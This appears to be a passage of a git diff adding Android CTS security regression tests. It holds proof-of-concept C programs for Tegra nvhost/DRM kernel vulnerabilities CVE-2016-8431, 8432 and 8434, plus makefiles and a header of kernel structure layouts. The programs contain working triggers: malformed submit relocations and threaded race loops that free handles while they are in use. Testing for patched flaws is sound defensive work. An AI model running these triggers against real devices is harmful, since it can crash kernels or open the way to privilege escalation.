+ g_nvmap_fd = open(dev_path, O_RDONLY);
+ if (g_nvmap_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+ return 1;
+}
+
+void trigger_channel_open() {
+ struct nvhost_channel_open_args args = {-1};
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args);
+ g_channel_fd = args.channel_fd;
+}
+
+int trigger_nvmap_create() {
+ g_nvmap_hdl.size = 0x1000;
+ ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl);
+ return g_nvmap_hdl.handle;
+}
+
+void trigger_nvmap_free() {
+ int data = g_nvmap_hdl.handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data);
+}
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.align = 0x1000;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ g_real_alloc.handle = handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+}
+void prepare_data() {
+ g_error_notifier.offset = 0;
+ g_error_notifier.mem = g_nvmap_hdl.handle;
+}
+
+void trigger_set_error_notifier() {
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+void* race_thread_2(void* arg) {
+ setup_privi_and_affinity(-19, 1);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ //trigger_nvmap_create();
+ trigger_nvmap_alloc(trigger_nvmap_create());
+ prepare_data();
+ //trigger_nvmap_free();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ pthread_create(&tid, NULL, race_thread_2, NULL);
+ usleep(100 * 1000);
+ pthread_cond_broadcast(&cond);
+
+ sleep(100);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
new file mode 100644
index 0000000..d0ef823
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8431
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
new file mode 100644
index 0000000..1cc0f29
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 1
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+
+struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+ gem_create.size = PAGE_SIZE;
+ return 0;
+}
+
+int main()
+{
+ int ret;
+ int i;
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].cmdbuf.offset = 8192;
+ relocs[i].target.handle = gem_create.handle;
+ relocs[i].target.offset = 8192;
+ }
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }else{
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
new file mode 100644
index 0000000..614d20b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8432
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
new file mode 100644
index 0000000..52b48f2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 100
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+volatile struct drm_gem_close gem_close;
+
+volatile struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+volatile struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static int prepare()
+{
+ int i;
+
+ open_c.client = HOST1X_CLASS_VIC;
+
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+
+ gem_close.handle = 1;
+
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = 0;
+ relocs[i].cmdbuf.handle = 0;
+ relocs[i].cmdbuf.offset = 0;
+ relocs[i].target.handle = 0;
+ relocs[i].target.offset = 0;
+ }
+
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+
+ gem_create.size = PAGE_SIZE;
+
+ return 0;
+}
+
+#define SUBMIT_THREAD_NUM 1
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+static void* submit_thread(void *no_use)
+{
+ set_affinity(1);
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ return NULL;
+}
+
+int main()
+{
+ int ret;
+ int i;
+ __u64 try_time;
+
+ set_affinity(0);
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ try_time = 1;
+ while(1){
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].target.handle = gem_create.handle;
+ }
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ }
+ usleep(150);
+ while(ioctl(dev_fd, DRM_IOCTL_GEM_CLOSE, &gem_close) == 0);
+ }
+ try_time++;
+ }
+
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_join(submit_thread_id[i], NULL);
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
new file mode 100644
index 0000000..6b20fe4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8434
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
new file mode 100644
index 0000000..de88a3b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
@@ -0,0 +1,171 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
